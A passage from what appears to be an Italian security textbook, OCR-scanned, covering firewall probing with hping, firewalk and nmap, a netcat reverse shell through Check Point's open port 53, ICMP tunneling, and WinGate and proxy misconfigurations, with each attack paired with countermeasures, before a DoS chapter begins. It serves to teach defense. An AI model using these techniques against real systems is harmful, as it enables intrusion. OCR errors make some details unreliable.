sui pacchetti ricevuti in cambio. Le risposte di hping dipendono da numerose con- 
dizioni. Ogni pacchetto contribuisce alla ricostruzione del profilo di controllo degli 
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accessi del firewall. Per esempio, hping permette di identificare i pacchetti aperti, 
bloccati, scartati e respinti. 

In questo esempio, hping rivela che la porta 80 è aperta e in attesa di una connes- 
sione: lo si capisce perché nel pacchetto ricevuto in risposta è attivato il flag SA (si 
tratta di un pacchetto SYN/ACK): 


[root]# hping2 192.168.0.2 -S -p 80 -n 

HPING ww.example.com (eth0 172.16.1.20): S set, 40 data bytes 

60 bytes from 192.168.0.2: flags=SA seq=0 tt1=242 id=65121 win=64240 
time=144.4 ms 


Ora sappiamo che esiste una porta aperta, attraverso la quale possiamo raggiungere 
il nostro obiettivo, ma non abbiamo ancora idea di dove sia il firewall. Nel prossimo 
esempio, hping segnala la ricezione di un pacchetto ICMP unreachable di tipo 13 
da 192.168.70.2. Come ricorderete dal Capitolo 2, i pacchetti ICMP di tipo 13 segna- 
lano la presenza di un filtro amministrativo e vengono solitamente inviati da router 
con funzionalità di filtraggio dei pacchetti come IOS di Cisco: 


[root]# hping2 192.168.0.2 -S -p 23 -n 
HPING 192.168.0.2 (eth0 172.16.1.20): S set, 40 data bytes 
ICMP Unreachable type 13 from 192.168.0.1 


Possiamo essere praticamente certi che 192.168.70.2 sia il firewall: inoltre sappiamo 
che blocca esplicitamente la porta 23 verso il nostro obiettivo. In altre parole, se si 
tratta di un router Cisco, probabilmente all’interno del suo file di configurazione si 
trova una riga come la seguente: 


access-list 101 deny tcp any any 23 ! telnet 


Nel prossimo esempio, la ricezione di un pacchetto RST/ACK potrebbe significare 
due cose: (1) che il pacchetto ha superato il firewall e che l’host non è in ascolto 
sulla porta specificata, oppure (2) che il firewall ha respinto il pacchetto (come nel 
caso di applicazione della regola di scarto di Check Point): 


[root]# hping2 192.168.0.2 -S -p 22 -n 
HPING 192.168.0.2 (eth0 172.16.1.20): S set, 40 data bytes 
60 bytes from 192.168.0.2: flags=RA seg=0 tt1=59 id=0 win=0 time=0.3 ms 


Avendo in precedenza già ricevuto un pacchetto ICMP di tipo 13, possiamo dedurre 
che il firewall (192.168.70.2) ha consentito il passaggio del nostro pacchetto, ma 
che l'host non è in ascolto su quella porta. 

Se il firewall che volete attraversare con la scansione è un Check Point, hping ri- 
porterà come indirizzo di IP di partenza quello dell'obiettivo, anche se il pacchetto 
viene effettivamente inviato dalla NIC esterna del firewall Check Point. Uno dei 
trucchi di Check Point è la sua capacità di rispondere al posto dei sistemi al suo in- 
terno, contraffacendo l'indirizzo del target insieme al messaggio. Quando si trova in 
queste condizioni su Internet, un hacker non è in grado di distinguere le due situa- 
zioni, perché non può vedere l'indirizzo MAC (che lo aiuterebbe a capire). 

Infine, se il firewall blocca tutti i pacchetti destinati a una porta, il più delle volte 
non si riceverà niente in cambio: 


[root]# hping 192.168,50.3 -S -p 22 -n 
HPING 192.168.50.3 (eth0 192,168.50.3): S set, 40 data bytes 
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L'esito di hping può avere due significati: il pacchetto non è riuscito a raggiungere 
la propria destinazione e vaga per i cavi, oppure, più probabilmente, un dispositivo 
(probabilmente il firewall 192.168.70.2) ha scartato il pacchetto sulla base della pro- 
pria ACL. 


Contromisure alla trasmissione 
di pacchetti di dati raw 


Prevenzione 


Impedire un attacco hping è difficile. L'unica speranza è bloccare i messaggi ICMP 
di tipo 13 (come abbiamo visto nel paragrafo dedicato alla prevenzione delle scan- 
sioni con nmap). 


CD) Firewalk 


Diffusione: > 
Semplicità: 3 
Impatto: 8 
Fattore di rischio: A 


Firewalk (http://ww.packetfactory.net/projects/firewalk/) è un piccolo 
programma assai interessante, che, analogamente a uno scanner di porte, è in grado 
di scoprire quali porte sono aperte dal lato opposto di un firewall. Scritto da Mike 
Schiffman, noto anche come Route, e Dave Goldsmith, questo tool effettua la scan- 
sione di un host posto dietro a un firewall e restituisce le regole che consentono 
l’accesso alla macchina, senza mai effettivamente toccare il sistema target. 

Per funzionare, Firewalk costruisce pacchetti impostando il TTL IP in modo che sca- 
da alla tappa successiva al firewall. Secondo la teoria, se il pacchetto riesce a supe- 
rare il firewall e scade come previsto, viene generato un messaggio “ICMP TTL 
expired in transit” (TTL scaduto durante il tragitto). Se, invece, il pacchetto viene 
bloccato dalla ACL del firewall, e quindi scartato, non viene inviata alcuna risposta, 
oppure viene generato un pacchetto ICMP di tipo 13 (“admin prohibited filter”): 


[root]# firewalk -pTCP -S135-140 10.22.3.1 

192.168.1.1 

Ramping up hopcounts to binding host... 

probe: 1 TTL: 1 port 33434: expired from [exposed.example.com] 
probe: 2 TTL: 2 port 33434: expired from [rtr.isp.net] 

probe: 3 TTL: 3 port 33434: Bound scan at 3 hops [rtr.isp.net] 
port 135: open 

port 136: open 

port 137: open 

port 138: open 

port 139: * 

port 140: open 


L'unico problema che abbiamo sperimentato con Firewalk è un certo grado di 
imprevedibilità, legata al fatto che alcuni firewall, accorgendosi che il pacchetto 
sta per scadere, restituiscono comunque un pacchetto ICMP TTL EXPIRED, sen- 
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za neppure verificare le proprie ACL. Di conseguenza, Firewalk ritiene aperte 
tutte le porte. 


| 
DÌ Contromisura a Firewalk 
Prevenzione 


Si potrebbero bloccare i pacchetti ICMP TTL EXPIRED a livello di interfaccia ester- 
na, ma questo avrebbe un impatto negativo sulle sue prestazioni, in quanto i client 
“legittimi” non saprebbero più cosa accade delle loro connessioni. 


® Scansione delle porte di origine 


I firewall a filtraggio di pacchetti tradizionali, come IOS di Cisco, hanno un solo 
grande difetto: non mantengono il loro stato. Per molti di voi questo appare ovvio, 
giusto? Ma riflettete un attimo: se il firewall non è in grado di mantenere il suo stato 
non può dirvi se la connessione è iniziata dentro o fuori da esso, In altre parole, 
non è in grado di controllare completamente alcune trasmissioni, quindi possiamo 
impostare la nostra porta di origine a una delle porte tipicamente consentite, come 
per esempio TCP 53 (trasferimenti della zona) e TCP 20 (dati FTP) ed effettuare la 
scansione del contenuto del sistema (o attaccarlo). 

Per scoprire se un firewall può essere attraversato mediante la scansione della porta 
di origine 20 (per esempio, il canale dati FTP), è possibile utilizzare l'opzione -g di 
nmap: 


nmap -sS -P® -g 20 -p 139 10.1.1.1 


Sarà necessario servirsi, in proposito, di SYN o della tecnica hbalf-scan 

De quando si stanno utilizzando le caratteristiche statiche della porta d’origi- 
ne di nmap. 

Se le porte risultano aperte, è probabile che sul vostro segmento ci sia un firewall 

vulnerabile. Per comprendere meglio la situazione, riportiamo di seguito uno sche- 

ma del funzionamento di questo tipo di attacco. 


Le comunicazioni tra il client interno e il server FTP 
avvengono utilizzando la sua porta TCP 21 aperta. 


Nel nostro scenario tipico, 

il firewall a filtraggio dei pacchetti 
deve mantenere aperte 
tutte le connessioni tra la porta 
di origine 20 e tutte 
le porte a numerazione elevata 


N25 Firewall a filtraggio __ 
dei sistemi che si trovano Server FTP di pacchetti Client interno 


sulla sua rete interna, » 
per consentire al canale dati FTP Il server FTP apre una connessione al client FTP 
di attraversare il firewall. tra la porta TCP 20 e una porta a numerazione elevata 
del client per la trasmissione dei dati. 


Nel nostro scenario 
di attacco, poiché 
il firewall a filtraggio 
di pacchetti non mantiene 
lo stato delle sue connessioni 
e quindi non è in grado 
di mettere in correlazione 
una connessione TCP 
con un’altra, tutte le connessioni 
tra la porta di origine 20 
e le porte a numerazione 
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Le comunicazioni tra il client interno e il server FTP 
avvengono utilizzando la sua porta TCP 21 aperta. 


Sistema Firewall a filtraggio Client 


dell’aggressore di pacchetti interno 
-——————rr______” el dd5.C 


Il sistema pirata apre una connessione 
al client interno tra la porta TCP 20 


elevata dei sistemi che si trovano 
sulla rete interna sono abilitate 
e possono attraversare 
il firewall inalterate. 


e una porta a numerazione elevata sul client, 
consentendo l’accesso completo al client. 


La scoperta che il firewall non mantiene lo stato delle sue connessioni può essere 
sfruttata per sferrare un attacco contro i sistemi vulnerabili che si trovano al di là di 
esso. Utilizzando uno strumento come Fpipe di Foundstone, è possibile impostare 
la porta di origine a 20 e attaccare a ripetizione il firewall. 


Contromisura alla scansione delle porte di origine 


Prevenzione 


Le soluzioni a questa vulnerabilità sono semplici ma non tutte attraenti: dovrete di- 
sabilitare tutte le comunicazioni che richiedono più di una combinazione di porte 
(per esempio, l’FTP tradizionale), oppure passare a un firewall proxy che sia in gra- 
do di esercitare un controllo migliore sulle connessioni entranti e uscenti, o ancora 
ricorrere ad applicazioni di gestione del firewall come Passive FTP, che sono con- 
formi alle regole stabilite dal firewall. 


Filtraggio dei pacchetti 


I firewall per il filtraggio dei pacchetti, come Firewall-1 di Check Point, Cisco PIX e 
IOS di Cisco (sì, IOS può essere anche impostato per essere un firewall), si servono 
di liste di controllo degli accessi, ACL (Access Contro! List), o di regole per stabilire 
se il traffico è autorizzato all'ingresso o all'uscita dalla rete interna. Nella maggior 
parte dei casi, queste ACL sono ben congegnate e difficilmente aggirabili, ma di tan- 
to in tanto capita di incrociare un firewall con ACL alquanto permissive, che con- 
sentono ad alcuni pacchetti di passare indisturbati. 
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® ACL permissive 


Diffusione: 8 
Semplicità: 2 
Impatto: 2 
Fattore di rischio: 4 


Liste di controllo degli accessi a maglie larghe sono presenti su molti firewall, sicu- 
ramente troppi. Considerate, per esempio, il caso di un'organizzazione che voglia 
consentire al proprio ISP di effettuare trasferimenti di zona. Una ACL poco prudente 
potrebbe essere “Consenti qualsiasi attività proveniente dalla porta TCP 53”, al con- 
trario di quella rigorosa “Consenti le attività da parte del server DNS dell’ISP con 
porta di origine 53 e porta di destinazione 53”. Il rischio legato a questi errori di 
configurazione può essere gravissimo, perché si permette a un hacker di effettuare 
una scansione dell'intera rete dall’esterno. La maggior parte di questi attacchi ha ini- 
zio con la scansione di un host protetto dal firewall utilizzando pacchetti in cui il 
numero della porta di partenza 53 (DNS) è contraffatto. 


Contromisure per le ACL permissive 
Prevenzione 


Assicuratevi che le norme del vostro firewall stabiliscano chi si può connettere a co- 
sa. Per esempio, se il vostro ISP richiede la possibilità di effettuare trasferimenti di 
zona, formulate le vostre regole in modo esplicito. Richiedete un indirizzo IP di par- 
tenza e fissate l'indirizzo IP di destinazione (quello del vostro server DNS interno) 
nel criterio di accesso che costruite. 

Se utilizzate un firewall Check Point, la seguente regola consente di vincolare la 
porta di origine 53 (DNS) esclusivamente al DNS del vostro ISP. Per esempio, se 
l'indirizzo del DNS dell'’ISP è 192.168.66.2 e quello del vostro DNS interno 
172.30.140.1, i parametri sono quelli mostrati nella tabella seguente. 


Sorgente Destinazione Servizio Azione Traccia 
192.168.66.2 172.30.140.1 domain-tcp Accept Short 


O Violazione di Check Point 


Diffusione: 8 
Semplicità: 753 
Impatto: 2 
Fattore di rischio: d 


Check Point 3.0 e 4.0 prevedono alcune porte aperte di default. Le ricerche DNS 
(UDP 53), i trasferimenti di zona DNS (TCP 53) e RIP (UDP 520) sono consentiti a 
partire da qualsiasi host su qualsiasi host e non vengono registrati. Questo può rive- 
larsi estremamente interessante, una volta che si riuscisse a manomettere un sistema 
interno. 
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Abbiamo già visto quanto sia semplice identificare un firewall Check Point. Ora, sfrut- 
tando queste nuove informazioni, un hacker è praticamente in grado di aggirare le re- 
gole impostate per il firewall. Ma questo tipo di attacco ha un prerequisito fondamenta- 
le: per funzionare è necessario che l’hacker sia riuscito a manomettere un sistema dal 
lato opposto del firewall, 0 a far eseguire un trojan a un utente di un sistema back-end. 
In entrambi i casi, il risultato finale è con ogni probabilità l'attivazione su un sistema 
all’interno della vostra rete di un listener di netcat in grado di restituire all’esterno 
una shell, nella quale digitare comandi che vengono eseguiti localmente sul sistema 
remoto. Queste backdoor verranno descritte in maggiore dettaglio nel Capitolo 14, 
ma anticipiamo qualche informazione per mettere a fuoco il problema. 

Come si vede nella figura seguente, Check Point consente il passaggio senza regi- 
strazione attraverso il firewall di pacchetti sulla porta TCP 53: se l'hacker riesce ad 
attivare un listener di netcat sulla porta 53 e a farsi restituire /bin/sh sulla propria 
macchina (anch'essa in ascolto sulla porta 53), in pratica è come se aprisse un buco 
nel firewall con un canale collegato al sistema manomesso. 


In una finestra, 
l'aggressore utilizza netcat 
per collegarsi al sistema 
sul lato opposto 

del firewall 

sulla porta 53. 


Il sistema manomesso 
esegue un listener 

di netcat sulla porta 53, 
che risponde sempre 


Aggressore —Firewall-I1 Check Point Sistema manomesso sulla porta 53. 


In un'altra finestra, 
netcat ascolta l'output proveniente 
sulla porta 53 dal sistema manomesso. 


© Contromisure alla violazione di Check Point 
Prevenzione 


A seconda delle vostre esigenze di configurazione, potreste decidere di disattivare 
parte del traffico consentito per default. Prestate attenzione, tuttavia, perché questo 
rimedio potrebbe impedire l’attraversamento del firewall da parte del traffico auto- 
rizzato. Per limitare l’accesso è sufficiente seguire i passaggi seguenti. 


1. Dall’interfaccia per i criteri di sicurezza, selezionate PolicyProperties. 


2. Disattivate la casella Accept per tutte le funzioni non strettamente necessa- 
rie: per esempio, molti siti non hanno motivo di consentire agli utenti 
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download da DNS. In questi casi è sufficiente disattivare l'opzione Accept 
Domain Name Downloads. La stessa tecnica permette di disattivare il traffi- 
co per RIP o ricerche su DNS. 

3. Create una regola personalizzata che consenta esclusivamente il traffico 
DNS proveniente da un server DNS autorizzato (come già visto nelle con- 
tromisure per le “ACL permissive”). 


E) Tunneling di ICMP e UDP 


Diffusione: 2 
Semplicità: 1 
Impatto: 9 
Fattore di rischio: + 


Il tunneling (incapsulamento) di ICMP è la possibilità di “impacchettare” dati reali 
all'interno di un’intestazione ICMP. Sono vulnerabili a questo tipo di attacco molti 
router e firewall che consentono il passaggio senza controlli di pacchetti ICMP 
ECHO, ICMP ECHO REPLY e UDP. Come accade nel caso del DNS di Check Point, 
l'attacco basato sul tunneling di ICMP e UDP ha come prerequisito la disponibilità 
di un sistema compromesso dall'altra parte del firewall. 

Jeremy Rauch e Mike Schiffman hanno messo in pratica il principio di incapsu- 
lamento realizzando gli strumenti necessari: loki (client) e lokid (server). Potete 
trovare l'articolo completo all'indirizzo http://ww.phrack-dont-give-a-shit- 
about -dmca.org/show. php?p=49&a=6. L'esecuzione del server lokid su un sistema 
posto dietro un firewall che consenta il passaggio di pacchetti IIMP ECHO e ECHO 
REPLY consente all'hacker di eseguire il client (Loki), che maschera ogni comando 
all'interno di pacchetti ICMP ECHO destinati al server (lokid). A sua volta, lokid 
apre il pacchetto, esegue il comando al suo interno e riconfeziona l’output generato 
in pacchetti ICMP ECHO REPLY, che restituisce all'hacker. Questo espediente con- 
sente agli hacker di aggirare del tutto il firewall. Il principio di funzionamento e il re- 
lativo attacco saranno oggetto di approfondimento nel Capitolo 14. 


DI Contromisure all’incapsulamento di ICMP e UDP 
Prevenzione 


Per impedire attacchi di questo tipo è possibile disattivare del tutto l’accesso via 
ICMP attraverso il firewall, oppure definire regole di controllo del traffico ICMP. Per 
esempio, la seguente ACL Cisco disattiva il traffico ICMP all'esterno della subnet 
172.29.10.0 per esigenze amministrative: 


access-list 101 permit icmp any 172.29.10.0 0.255.255.255 8 ! echo 
access-list 101 permit icmp any 172.29.10.0 0.255.255.255 0 ! echo-reply 
access-list 102 deny ip any any log ! deny and log all else 


lizzando ping ICMP (pratica altamente sconsigliata), queste ACL faranno 
fallire la verifica. Chiedete al vostro ISP se utilizza ping ICMP per verificare 
i vostri sistemi. 


O Se il vostro ISP controlla la disponibilità dei sistemi protetti dal firewall uti- 
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Vulnerabilità dei proxy applicativi 


Generalmente i punti deboli dei proxy applicativi sono pochi e ben nascosti. Una 
volta reso sicuro il firewall e implementate sul proxy regole robuste, sarà ben diffi- 
cile superare un firewall proxy. Ma non temete: gli errori di configurazione sono 
tutt'altro che rari. 


® Hostname: localhost 


Diffusione: d 
Semplicità: & 
Impatto: 9 
Fattore di rischio: 5 


Sui vecchi proxy UNIX era facile dimenticarsi di limitare l’accesso locale. Nonostante 
i vincoli di autenticazione per gli utenti che accedono a Internet, un utente interno 
poteva ottenere l’accesso in locale al firewall stesso. Ovviamente, per questo tipo di 
attacco è necessario conoscere una combinazione nome utente-password valida, ma 

vi sorprenderebbe sapere quanto sia facile a volte indovinarne una buona. Per verifi- 
care l'esposizione dei vostri firewall proxy a questo attacco potete seguire la proce- 
dura seguente. Quando ottenete la schermata di connessione seguente: 


C:\> nc -v -n 192.168.51.129 23 
(UNKNOWN) [192.168.51.129] 23 (?) open 
Eagle Secure Gateway. 

Hostname: 


applicate la procedura elencata di seguito. 
1. Digitate localhost. 
2. Digitate una combinazione nome utente-password nota, o tentate di indovi- 
narne una. 
3. Se l'autenticazione ha esito positivo, avete accesso in locale al firewall. 
4. Eseguite un overflow del buffer (per esempio con rdist) o un attacco ana- 
logo, per ottenere l’accesso come root. 


i Contromisure per hostname:localhost 
Prevenzione 


Il rimedio per questi errori di configurazione dipende ovviamente dallo specifico 
prodotto utilizzato come firewall. In generale, dovrebbe essere possibile definire 
una regola che limiti l'accesso a partire da un sito specifico. L'ideale sarebbe impe- 
dire i login come localhost, ma se questi sono necessari potreste utilizzare il pro- 
gramma TCP wrappers di Wieste Venema (ftp://coast.cs.purdue.edu/pub/ to- 
ols/unix/netutils/tcp_wrappers/) per stabilire in base all'indirizzo IP quali 
sono gli host che possono collegarsi. 


468 Capitolo || 


® Accesso non autenticato al proxy esterno 


Diffusione: 8 
Semplicità: 8 
Impatto: 4 
Fattore di rischio: 7 


Questo scenario si presenta più frequentemente nel caso di firewall che utilizzano 
proxy “trasparenti”, ma di tanto in tanto capita di incontrarlo. L'amministratore di un 
firewall si fa in quattro per rendere sicura la propria macchina e implementare rego- 
le di accesso rigorose, ma spesso dimentica di disattivare l’accesso verso l'esterno. I 
rischi sono due: un hacker potrebbe servirsi del vostro server proxy come trampoli- 
no per vagare su Internet anonimamente e attaccare altri server Web, oppure po- 
trebbe ottenere l'accesso via Web all'intera Intranet. Ci siamo imbattuti in un 
firewall configurato in questo modo e siamo stati in grado di accedere alla Intranet 
della società. ; 

Per verificare se il vostro firewall sia vulnerabile, potete modificare le impostazioni 
proxy del vostro browser in modo che puntino al firewall in questione. In Netscape, 
seguite la procedura elencata di seguito. 


1. Selezionate Edit/Preferences. 

2. Selezionate i sottorami Advanced e Proxies. 

3. Selezionate l'opzione Manual Proxy Configuration. 

4. Premete il pulsante View. 

5. Aggiungete il firewall nella casella dell'indirizzo HTTP, specificando la por- 


ta su cui ascolta (di solito 80, 81, 8000 o 8080, ma non è detto: servitevi di 
nmap o uno strumento analogo per identificare la porta giusta). 


6. Accedete con il browser a un sito Web e prestate attenzione a quanto acca- 
de sulla barra di stato. 


Se nella barra di stato del browser viene riportato l’accesso al server proxy e la pa- 
gina Web viene aperta, con ogni probabilità avete scoperto un server proxy non au- 
tenticato. 

A questo punto, se disponete dell’indirizzo IP di un sito Web interno (indipendente- 
mente dal fatto che l'indirizzo sia instradabile o meno), potete provare ad accedervi 
nello stesso modo. Talvolta questo indirizzo è desumibile dal codice sorgente HTTP; 
infatti i progettisti Web hanno il vizio di inserire i nomi host e gli indirizzi IP negli 
HREF delle pagine Web. 


Contromisure all’accesso 
non autenticato al proxy esterno 


Prevenzione 


Il rimedio per questo problema è disattivare l’accesso al proxy dall'interfaccia ester- 
na del firewall. Il metodo adottato per disattivarlo dipende in larga misura dal pro- 
duttore, quindi per ulteriori indicazioni dovrete contattare il fornitore del firewall. 
La soluzione a livello di rete è bloccare il traffico in ingresso del proxy sui router 
esterni. A tal fine è sufficiente definire sui router alcune ACL rigide. 
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Vulnerabilità di WinGate 


Di WinGate, un firewall proxy per Windows 95/NT molto popolare (http://win- 
gate.deerfield.com/wingate/), sono ormai noti alcuni punti deboli, per la mag- 
gior parte derivanti da impostazioni password troppo “lassiste”, tra cui la mancanza 
di autenticazione per telnet, SOCKS e Web. Nonostante sia possibile regolare l’ac- 
cesso a questi servizi per utente (o per interfaccia), molti si limitano a installare il 
pacchetto così com'è, tralasciando la sicurezza per la fretta di metterlo in funzione. 
Sul sito di CyberArmy (http://ww.cpc-net.org/postnuke/modules.php?op=mo - 
dload&name=Tools&file=proxies) viene mantenuto un elenco non verificato di 
server WinGate. 


{ . . . . 
Navigazione senza autenticazione 


Diffusione: 9 
Semplicità: 9 
Impatto: 2 
Fattore di rischio: 7 


Come accade per molti altri proxy configurati in modo errato, certe versioni di Win- 
Gate (in particolare la 2.1d per Windows) consentono a utenti esterni di navigare su 
Internet nel più completo anonimato. Si tratta di una possibilità fondamentale per 
gli hacker che puntano in particolare alle applicazioni presenti sul server Web, per- 
ché permette loro di operare riducendo al minimo il rischio di essere colti in fla- 
grante. Un attacco Web trova solitamente il target indifeso, perché tutto il traffico 
viene incanalato sulla porta TCP 80 o cifrato sulla porta 443 (SSL). Per maggiori det- 
tagli sull'hacking del Web, vi rimandiamo al Capitolo 15. 
Per verificare se i vostri server WinGate sono vulnerabili seguite la procedura de- 
scritta di seguito. 
1. Collegatevi a Internet con una connessione non filtrata (preferibilmente via 
telefono). 
2. Modificate la configurazione del browser in modo che punti a un server 
proxy. 
3. Specificate il server e la porta in questione. 


Altrettanto vulnerabile nella configurazione predefinita è il proxy SOCKS (TCP 
1080) non autenticato. Esattamente come accade nel caso di proxy Web (TCP 80) 
aperti, un hacker potrebbe riuscire a navigare in Internet “rimbalzando” su questi 
server e restando praticamente anonimo (specialmente se il logging è disattivato). 


Contromisure alla navigazione senza autenticazione 
Prevenzione 


Per rimediare a questi inconvenienti con WinGate, è sufficiente limitare i binding di 
servizi specifici. La seguente procedura consente di stabilire dove vengono offerti i 
servizi proxy all'interno di un sistema multiserver. 

1. Selezionate le proprietà di SOCKS o WWW Proxy Server. 
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(2°) 


Selezionate la scheda Bindings. 

3. Attivate la casella Connections Will Be Accepted On The Following Interface 
Only (Accetta le connessioni solo sulla seguente interfaccia) e specificate 
l'indirizzo dell’interfaccia interna del vostro server WinGate. 


DC) Invito a nozze per l’hacker: telnet non autenticato 


Diffusione: 9 
Semplicità: 9 
Impatto: 6 
Fattore di rischio: 8 


Peggio della navigazione anonima del Web c'è sicuramente l’accesso non autentica- 
to via telnet (uno dei numeri preferiti nel repertorio degli hacker). Collegandosi a 
telnet su un server WinGate configurato male, l’hacker può utilizzare le vostre mac- 
chine per nascondere le proprie tracce e attaccare in piena libertà. 
Per identificare i server vulnerabili, adottate la procedura seguente. 


1. Con telnet, cercate di collegarvi al server. 

2. Se ricevete la risposta seguente, digitate il sito a cui collegarvi. 
[root]# telnet 172.29.11.191 
Trying 172.29.11.191... 
Connected to 172.29.11.191. 


Escape character is '°]'. 
Wingate> 10.50.21.5 


3. Se a questo punto vedete il prompt del nuovo sistema, significa che avete 
un server vulnerabile. 


Connecting to host 10.50.21.5...Connected 
Sunos 5.6 
login: 


O) Contromisure al telnet non autenticato 
Prevenzione 
Il rimedio per questo problema è simile a quello visto per la navigazione non auten- 
ticata: è sufficiente limitare i binding di servizi specifici all’interno di WinGate, utiliz- 
zando la seguente procedura (per sistemi multiserver). 

1. Selezionate le proprietà del server telnet. 
. Selezionate la scheda Bindings. 


DN 


. Attivate la casella Connections Will Be Accepted On The Following Interface 
Only (Accetta le connessioni solo sulla seguente interfaccia) e specificate 
l'indirizzo dell'interfaccia interna del vostro server WinGate. 
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19 Consultazione di file 


Diffusione: 9 
Semplicità: 9 
Impatto: 9 
Fattore di rischio: 9 


L'impostazione predefinita di WinGate 3.0 consente di visualizzare i file presenti sul 
sistema attraverso la porta di gestione (8010). Per verificare se il vostro sistema è 
vulnerabile, eseguite i comandi seguenti: 


http://192.168.51.101:8010/c:/ 
http://192.168.51.101:8010// 
http://192.168.51.101:8010/..../ 


Se il sistema è vulnerabile, dovreste riuscire a consultare ogni file nella directory e 
spostarvi liberamente dentro e fuori dalle directory. Questo può rivelarsi pe- 
ricoloso, perché alcune applicazioni conservano in chiaro i nomi utente e le 
password. Per esempio, se utilizzate Remotely Possible di Computer Associates © 
ControliT per controllare da remoto i vostri server, i nomi utente e le password di 
autenticazione sono conservati in chiaro o nascosti con semplici procedimenti di 
cifratura (Capitolo 13). 


Contromisure alla consultazione di file 


Attualmente WinGate non prevede patch per la soluzione del problema della con- 
sultazione dei file. Per ulteriori informazioni su eventuali aggiornamenti disponibili, 
vi consigliamo di visitare il sito http: //ww.deerfield.com. 


Capitolo 12 
Denial of Service 


Smurf, Fraggle, boink e teardrop. No, non siamo impazziti, sono semplicemente al- 
cuni degli strumenti a disposizione degli hacker per seminare panico e devastazio- 
ne su Internet. Attacchi di tipo DoS (Denial of Service), ossia rifiuto del servizio, co- 
stano alle aziende diversi milioni di euro ogni anno e rappresentano una seria mi- 
naccia a qualsiasi sistema o rete. I costi sono dovuti al tempo necessario per il ripri- 
stino, a mancati introiti e al lavoro fisicamente necessario per identificare e annulla- 
re questi attacchi. Fondamentalmente, un attacco DoS peggiora o impedisce del tut- 
to il servizio a utenti, reti e sistemi legittimi. L'obiettivo di questi tipi di attacco è so- 
litamente di natura ostile e le competenze richieste sono minime, poiché tutti gli 
strumenti necessari sono già pronti. 

Nel corso degli anni sono stati sferrati numerosi attacchi DoS, inclusi quelli contro alcu- 
ni dei siti Web di maggior rilievo come Yahoo, eBay, Buy.com, CNN.com, E*TRADE, 
ZDNet e PANIX.com, che li hanno resi inagibili per un breve periodo di tempo. Questi 
attacchi sono stati immediatamente identificati come attacchi DDoS (DoS distribuito), 
in quanto la loro ferocia andava ben oltre il tipico attacco DoS. La rivelazione più 
preoccupante risiede nel fatto che la maggior parte di questi attacchi si è limitata a 
sfruttare alcuni difetti intrinseci dei protocolli di base di Internet (TCP/IP) e, in partico- 
lare, il modo in cui i sistemi gestivano le richieste di tipo SYN (questo significa che il 
problema risiede nella struttura fisica della rete). La situazione era aggravata dal fatto 
che l’hacker aveva contraffatto l'indirizzo di rete per mascherare la propria identità. Di 
conseguenza, in questi e in molti altri casi successivi, è stato difficile risalire al vero au- 
tore dell'attacco. Questo fatto ha significativamente colpito la comunità Internet, sotto- 
lineando quanto la Rete sia fragile; da quel momento, infatti, la gente si è resa conto di 
quanto fosse rischioso condurre attività commerciali nell'era dell’informazione. 


Motivazioni di un attacco DoS 


Nel corso di questo libro, abbiamo esaminato e illustrato molti degli strumenti e del- 
le tecniche utilizzate dagli hacker per sovvertire la sicurezza dei sistemi target del- 
l'attacco. Molte volte, è sufficiente la sicurezza intrinseca del sistema per frustrare le 
velleità di aggressione dei pirati meno dotati. Umiliato e impotente, come ultima ri- 
sorsa l’hacker lancia un attacco DoS. 

A parte la frustrazione, alcune persone possono provare risentimento verso qualcu- 
no o qualcosa, per motivi personali o politici, e cercare di vendicarsi. Molti esperti 
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di sicurezza ritengono che attacchi di questo tipo siano destinati ad aumentare con 
la diffusione dei sistemi Windows di Microsoft. A causa della sua popolarità Win- 
dows è uno degli ambienti target preferiti da molti aggressori; inoltre, molti stru- 
menti DoS presentano un'interfaccia estremamente intuitiva e richiedono compe- 
tenze tecniche minime. 

Anche se la maggior parte degli attacchi rientra nella casistica citata prima, in certi 
casi gli aggressori si trovano a dover portare un attacco DoS per manomettere un si- 
stema vulnerabile. Come sa bene la maggior parte degli amministratori di sistemi 
Windows, per rendere effettive le modifiche, nella maggior parte dei casi è richiesto 
il riavvio della macchina, Quindi, una volta apportate a un sistema NT le modifiche 
che consentiranno l’accesso con diritti amministrativi, l'hacker potrebbe mandare in 
crash il sistema, obbligando l'amministratore a riavviarlo. Questo evento dovrebbe 
attirare l’attenzione sul server vulnerabile e, potenzialmente, sull’intruso; tuttavia la 
maggior parte degli amministratori sottovaluta il blocco del sistema e lo riavvia sen- 
za troppe preoccupazioni. 

Chiaramente non possiamo pensare di descrivere ogni possibile motivazione alla 
base di attacchi DoS, ma è un fatto innegabile che il cyberspazio riproduce la vita rea- 
le. Alcuni malintenzionati si sentono elettrizzati dal senso di potere che un attacco 
DoS procura loro. Ironia della sorte, la maggior parte degli hacker più competenti de- 
testa gli attacchi DoS e chi li attua. 


Tipi di attacchi DoS 


Sfortunatamente, gli attacchi DoS sono diventati lo strumento preferito dai cyberter- 
roristi per mettere fuori uso i sistemi, da quando siamo entrati nel millennio 
dell'elettronica. In realtà, spesso è molto più facile compromettere il funzionamento 
di una rete o di un sistema, piuttosto che ottenerne l’accesso. Con l'avvento dei si- 
stemi connessi in rete SCADA (Supervisory Control and Data Acquisition), l’esposi- 
zione agli attacchi Do$ ha assunto proporzioni catastrofiche. Per chi non li cono- 
scesse, i sistemi interconnessi SCADA sono utilizzati per gestire infrastrutture estese 
a un'intera nazione, per esempio la distribuzione dell'energia elettrica, dell’acqua e 
di altri beni di largo consumo. 

I protocolli di rete come TCP/IP sono stati ideati per l'utilizzo in comunità aperte 
basate sulla fiducia reciproca, e le diverse implementazioni della versione 4 attuale 
del protocollo risentono di problemi intrinseci. Inoltre, molti sistemi operativi e di- 
spositivi di rete presentano nella propria implementazione dello stack di rete difetti 
che ne indeboliscono la resistenza ad attacchi di tipo DoS. Abbiamo visto crollare 
diversi dispositivi per il controllo dei processi dotati di stack IP rudimentali, per ef- 
fetto di una semplice redirezione ICMP con parametri non validi. Esistono molti 
strumenti che consentono di effettuare attacchi DoS, ma è importante riuscire a 
identificare quali siano i tipi di attacco a cui si è più esposti e comprendere come in- 
dividuarli e prevenirli. Per prima cosa, faremo una panoramica sui quattro tipi fon- 
damentali di attacchi DoS. 


Esaurimento della larghezza di banda 


Le forme più insidiose di attacchi DoS si basano sull’esaurimento della larghezza di 
banda (bandwidtb consumption). Fondamentalmente, l'hacker cercherà di consu- 
mare l’intera larghezza di banda a disposizione di una certa rete. Nonostante questo 
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tipo di attacco sia possibile anche su una rete locale, il più delle volte gli hacker cer- 
cheranno di esaurire le risorse da remoto. Esistono due scenari principali per que- 
sto tipo di attacco. 


Scenario | 


L'hacker è in grado di ingolfare la connessione di rete della sua vittima, perché ha a 
